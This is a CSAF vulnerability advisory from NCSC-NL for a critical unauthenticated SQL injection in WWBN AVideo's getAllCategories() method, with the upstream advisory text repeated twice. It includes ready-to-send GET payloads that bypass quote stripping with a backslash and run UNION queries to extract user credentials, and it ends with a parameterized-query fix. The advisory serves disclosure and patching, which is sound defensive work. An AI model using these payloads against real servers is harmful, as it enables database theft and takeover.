{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33352", "tracking": { "current_release_date": "2026-03-26T00:45:56.184705Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33352", "initial_release_date": "2026-03-21T01:08:18.691400Z", "revision_history": [ { "date": "2026-03-21T01:08:18.691400Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-21T01:08:22.304159Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-23T17:30:33.011747Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-23T17:30:38.319442Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-23T18:12:42.502161Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-23T18:12:44.755144Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-24T02:21:18.677696Z", "number": "7", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-24T02:21:24.159284Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:56:13.971429Z", "number": "9", "summary": "Unknown change." }, { "date": "2026-03-24T20:57:33.093832Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-24T21:37:34.863831Z", "number": "11", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-24T21:37:36.907416Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-25T20:11:48.921422Z", "number": "13", "summary": "References created (2)." }, { "date": "2026-03-25T20:11:53.518757Z", "number": "14", "summary": "NCSC Score updated." }, { "date": "2026-03-26T00:45:42.020382Z", "number": "15", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)." } ], "status": "interim", "version": "15" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<26.0", "product": { "name": "vers:unknown/<26.0", "product_id": "CSAFPID-5874460", "product_identification_helper": { "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "AVideo" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/10.4", "product": { "name": "vers:unknown/10.4", "product_id": "CSAFPID-5656122", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.4" } } }, { "category": "product_version_range", "name": "vers:unknown/10.8", "product": { "name": "vers:unknown/10.8", "product_id": "CSAFPID-5656123", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.8" } } }, { "category": "product_version_range", "name": "vers:unknown/11", "product": { "name": "vers:unknown/11", "product_id": "CSAFPID-5656124", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1", "product": { "name": "vers:unknown/11.1", "product_id": "CSAFPID-5656125", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1.1", "product": { "name": "vers:unknown/11.1.1", "product_id": "CSAFPID-5656126", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.5", "product": { "name": "vers:unknown/11.5", "product_id": "CSAFPID-5656127", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.5" } } }, { "category": "product_version_range", "name": "vers:unknown/11.6", "product": { "name": "vers:unknown/11.6", "product_id": "CSAFPID-5656128", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.6" } } }, { "category": "product_version_range", "name": "vers:unknown/12.4", "product": { "name": "vers:unknown/12.4", "product_id": "CSAFPID-5656129", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@12.4" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3", "product": { "name": "vers:unknown/14.3", "product_id": "CSAFPID-5656130", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3.1", "product": { "name": "vers:unknown/14.3.1", "product_id": "CSAFPID-5656131", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/14.4", "product": { "name": "vers:unknown/14.4", "product_id": "CSAFPID-5656132", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.4" } } }, { "category": "product_version_range", "name": "vers:unknown/18.0", "product": { "name": "vers:unknown/18.0", "product_id": "CSAFPID-5656133", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@18.0" } } }, { "category": "product_version_range", "name": "vers:unknown/21.0", "product": { "name": "vers:unknown/21.0", "product_id": "CSAFPID-5721197", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@21.0" } } }, { "category": "product_version_range", "name": "vers:unknown/22.0", "product": { "name": "vers:unknown/22.0", "product_id": "CSAFPID-5772271", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@22.0" } } }, { "category": "product_version_range", "name": "vers:unknown/24.0", "product": { "name": "vers:unknown/24.0", "product_id": "CSAFPID-5772272", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@24.0" } } }, { "category": "product_version_range", "name": "vers:unknown/25.0", "product": { "name": "vers:unknown/25.0", "product_id": "CSAFPID-5840723", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@25.0" } } }, { "category": "product_version_range", "name": "vers:unknown/26.0", "product": { "name": "vers:unknown/26.0", "product_id": "CSAFPID-5878928", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@26.0" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=26.0", "product": { "name": "vers:unknown/>=0|<=26.0", "product_id": "CSAFPID-5878929" } } ], "category": "product_name", "name": "avideo" } ], "category": "vendor", "name": "WWBN" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33352", "cwe": { "id": "CWE-89", "name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')" }, "notes": [ { "category": "description", "text": "### Summary\n\nAn unauthenticated SQL injection vulnerability exists in `objects/category.php` in the `getAllCategories()` method. The `doNotShowCats` request parameter is sanitized only by stripping single-quote characters (`str_replace(\"'\", '', ...)`), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in `objects/security.php`.\n\n### Affected Component\n\n**File:** `objects/category.php`, lines 386-394, inside method `getAllCategories()`\n\n```php\nif (!empty($_REQUEST['doNotShowCats'])) {\n $doNotShowCats = $_REQUEST['doNotShowCats'];\n if (!is_array($_REQUEST['doNotShowCats'])) {\n $doNotShowCats = array($_REQUEST['doNotShowCats']);\n }\n foreach ($doNotShowCats as $key => $value) {\n $doNotShowCats[$key] = str_replace(\"'\", '', $value); // INSUFFICIENT\n }\n $sql .= \" AND (c.clean_name NOT IN ('\" . implode(\"', '\", $doNotShowCats) . \"') )\";\n}\n```\n\n### Root Cause\n\n1. **Incomplete sanitization:** The only defense is `str_replace(\"'\", '', $value)`, which strips single-quote characters. It does **not** strip backslashes (`\\`).\n2. **No global filter coverage:** The `doNotShowCats` parameter is absent from every filter list in `objects/security.php` (`$securityFilter`, `$securityFilterInt`, `$securityRemoveSingleQuotes`, `$securityRemoveNonChars`, `$securityRemoveNonCharsStrict`, `$filterURL`, and the `_id` suffix pattern).\n3. **Direct string concatenation into SQL:** The filtered values are concatenated into the SQL query via `implode()` instead of using parameterized queries.\n\n### Exploitation\n\nMySQL, by default, treats the backslash (`\\`) as an escape character inside string literals (unless `NO_BACKSLASH_ESCAPES` SQL mode is enabled, which is uncommon). This allows a backslash in one array element to escape the closing single-quote that `implode()` adds, shifting the string boundary and turning the next array element into executable SQL.\n\n**Step-by-step:**\n\n1. The attacker sends:\n ```\n GET /categories.json.php?doNotShowCats[0]=\\&doNotShowCats[1]=)%20OR%201=1)--%20-\n ```\n\n2. After `str_replace(\"'\", '', ...)`, values are unchanged (no single quotes to strip):\n - Element 0: `\\`\n - Element 1: `) OR 1=1)-- -`\n\n3. After `implode(\"', '\", ...)`, the concatenated string is:\n ```\n \\', ') OR 1=1)-- -\n ```\n\n4. The full SQL becomes:\n ```sql\n AND (c.clean_name NOT IN ('\\', ') OR 1=1)-- -') )\n ```\n\n5. MySQL parses this as:\n - `'\\'` — the `\\` escapes the next `'`, making it a literal quote character inside the string. The string continues.\n - `, '` — the comma and space are part of the string. The next `'` (which was the opening quote of element 1) **closes** the string.\n - String value = `', ` (three characters: quote, comma, space)\n - `) OR 1=1)` — executable SQL. The first `)` closes `NOT IN (`, the second `)` closes the outer `AND (`.\n - `-- -` — SQL comment, discards the remainder `') )`\n\n Effective SQL:\n ```sql\n AND (c.clean_name NOT IN (', ') OR 1=1)\n ```\n This always evaluates to `TRUE`.\n\n**For data extraction (UNION-based):**\n\n```\nGET /categories.json.php?doNotShowCats[0]=\\&doNotShowCats[1]=))%20UNION%20SELECT%201,user,password,4,5,6,7,8,9,10,11,12,13,14%20FROM%20users--%20-\n```\n\nProduces:\n```sql\nAND (c.clean_name NOT IN ('\\', ')) UNION SELECT 1,user,password,4,5,6,7,8,9,10,11,12,13,14 FROM users-- -') )\n```\n\nThis appends a UNION query that extracts usernames and password hashes from the `users` table. The attacker must match the column count of the original `SELECT` (determinable through iterative probing).\n\n### Impact\n\n- **Confidentiality:** Full read access to the entire database, including user credentials, emails, private video metadata, API secrets, and plugin configuration.\n- **Integrity:** Ability to modify or delete any data in the database via stacked queries or subqueries (e.g., `UPDATE users SET isAdmin=1`).\n- **Availability:** Ability to drop tables or corrupt data.\n- **Potential RCE:** On MySQL configurations that allow `SELECT ... INTO OUTFILE`, the attacker could write a PHP web shell to the server's document root.\n\n### Suggested Fix\n\nReplace the string concatenation with parameterized queries:\n\n```php\nif (!empty($_REQUEST['doNotShowCats'])) {\n $doNotShowCats = $_REQUEST['doNotShowCats'];\n if (!is_array($doNotShowCats)) {\n $doNotShowCats = array($doNotShowCats);\n }\n $placeholders = array_fill(0, count($doNotShowCats), '?');\n $formats = str_repeat('s', count($doNotShowCats));\n $sql .= \" AND (c.clean_name NOT IN (\" . implode(',', $placeholders) . \") )\";\n // Pass $formats and $doNotShowCats to sqlDAL::readSql() as bind parameters\n}\n```\n\nAlternatively, use `$global['mysqli']->real_escape_string()` on each value as a minimum fix, though parameterized queries are strongly preferred.", "title": "github - https://api.github.com/advisories/GHSA-mcj5-6qr4-95fj" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. Prior to version 26.0, an unauthenticated SQL injection vulnerability exists in `objects/category.php` in the `getAllCategories()` method. The `doNotShowCats` request parameter is sanitized only by stripping single-quote characters (`str_replace(\"'\", '', ...)`), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in `objects/security.php`. Version 26.0 contains a patch for the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33352" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. Prior to version 26.0, an unauthenticated SQL injection vulnerability exists in `objects/category.php` in the `getAllCategories()` method. The `doNotShowCats` request parameter is sanitized only by stripping single-quote characters (`str_replace(\"'\", '', ...)`), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in `objects/security.php`. Version 26.0 contains a patch for the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33352.json" }, { "category": "description", "text": "### Summary\n\nAn unauthenticated SQL injection vulnerability exists in `objects/category.php` in the `getAllCategories()` method. The `doNotShowCats` request parameter is sanitized only by stripping single-quote characters (`str_replace(\"'\", '', ...)`), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in `objects/security.php`.\n\n### Affected Component\n\n**File:** `objects/category.php`, lines 386-394, inside method `getAllCategories()`\n\n```php\nif (!empty($_REQUEST['doNotShowCats'])) {\n $doNotShowCats = $_REQUEST['doNotShowCats'];\n if (!is_array($_REQUEST['doNotShowCats'])) {\n $doNotShowCats = array($_REQUEST['doNotShowCats']);\n }\n foreach ($doNotShowCats as $key => $value) {\n $doNotShowCats[$key] = str_replace(\"'\", '', $value); // INSUFFICIENT\n }\n $sql .= \" AND (c.clean_name NOT IN ('\" . implode(\"', '\", $doNotShowCats) . \"') )\";\n}\n```\n\n### Root Cause\n\n1. **Incomplete sanitization:** The only defense is `str_replace(\"'\", '', $value)`, which strips single-quote characters. It does **not** strip backslashes (`\\`).\n2. **No global filter coverage:** The `doNotShowCats` parameter is absent from every filter list in `objects/security.php` (`$securityFilter`, `$securityFilterInt`, `$securityRemoveSingleQuotes`, `$securityRemoveNonChars`, `$securityRemoveNonCharsStrict`, `$filterURL`, and the `_id` suffix pattern).\n3. **Direct string concatenation into SQL:** The filtered values are concatenated into the SQL query via `implode()` instead of using parameterized queries.\n\n### Exploitation\n\nMySQL, by default, treats the backslash (`\\`) as an escape character inside string literals (unless `NO_BACKSLASH_ESCAPES` SQL mode is enabled, which is uncommon). This allows a backslash in one array element to escape the closing single-quote that `implode()` adds, shifting the string boundary and turning the next array element into executable SQL.\n\n**Step-by-step:**\n\n1. The attacker sends:\n ```\n GET /categories.json.php?doNotShowCats[0]=\\&doNotShowCats[1]=)%20OR%201=1)--%20-\n ```\n\n2. After `str_replace(\"'\", '', ...)`, values are unchanged (no single quotes to strip):\n - Element 0: `\\`\n - Element 1: `) OR 1=1)-- -`\n\n3. After `implode(\"', '\", ...)`, the concatenated string is:\n ```\n \\', ') OR 1=1)-- -\n ```\n\n4. The full SQL becomes:\n ```sql\n AND (c.clean_name NOT IN ('\\', ') OR 1=1)-- -') )\n ```\n\n5. MySQL parses this as:\n - `'\\'` — the `\\` escapes the next `'`, making it a literal quote character inside the string. The string continues.\n - `, '` — the comma and space are part of the string. The next `'` (which was the opening quote of element 1) **closes** the string.\n - String value = `', ` (three characters: quote, comma, space)\n - `) OR 1=1)` — executable SQL. The first `)` closes `NOT IN (`, the second `)` closes the outer `AND (`.\n - `-- -` — SQL comment, discards the remainder `') )`\n\n Effective SQL:\n ```sql\n AND (c.clean_name NOT IN (', ') OR 1=1)\n ```\n This always evaluates to `TRUE`.\n\n**For data extraction (UNION-based):**\n\n```\nGET /categories.json.php?doNotShowCats[0]=\\&doNotShowCats[1]=))%20UNION%20SELECT%201,user,password,4,5,6,7,8,9,10,11,12,13,14%20FROM%20users--%20-\n```\n\nProduces:\n```sql\nAND (c.clean_name NOT IN ('\\', ')) UNION SELECT 1,user,password,4,5,6,7,8,9,10,11,12,13,14 FROM users-- -') )\n```\n\nThis appends a UNION query that extracts usernames and password hashes from the `users` table. The attacker must match the column count of the original `SELECT` (determinable through iterative probing).\n\n### Impact\n\n- **Confidentiality:** Full read access to the entire database, including user credentials, emails, private video metadata, API secrets, and plugin configuration.\n- **Integrity:** Ability to modify or delete any data in the database via stacked queries or subqueries (e.g., `UPDATE users SET isAdmin=1`).\n- **Availability:** Ability to drop tables or corrupt data.\n- **Potential RCE:** On MySQL configurations that allow `SELECT ... INTO OUTFILE`, the attacker could write a PHP web shell to the server's document root.\n\n### Suggested Fix\n\nReplace the string concatenation with parameterized queries:\n\n```php\nif (!empty($_REQUEST['doNotShowCats'])) {\n $doNotShowCats = $_REQUEST['doNotShowCats'];\n if (!is_array($doNotShowCats)) {\n $doNotShowCats = array($doNotShowCats);\n }\n $placeholders = array_fill(0, count($doNotShowCats), '?');\n $formats = str_repeat('s', count($doNotShowCats));\n $sql .= \" AND (c.clean_name NOT IN (\" . implode(',', $placeholders) . \") )\";\n // Pass $formats and $doNotShowCats to sqlDAL::readSql() as bind parameters\n}\n```\n\nAlternatively, use `$global['mysqli']->real_escape_string()` on each value as a minimum fix, though parameterized queries are strongly preferred.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-mcj5-6qr4-95fj.json?alt=media" }, { "category": "other", "text": "0.00029", "title": "EPSS" }, { "category": "other", "text": "3.4", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, Is related to CWE-89 (Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')), There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5874460", "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-mcj5-6qr4-95fj" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33352" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33352.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-mcj5-6qr4-95fj.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mcj5-6qr4-95fj" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-mcj5-6qr4-95fj" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/commit/206d38e97b8c854771bb2907b13f9f36e8bcf874" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33352" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL" }, "products": [ "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5874460", "CSAFPID-5878928", "CSAFPID-5878929" ] } ], "title": "CVE-2026-33352" } ] }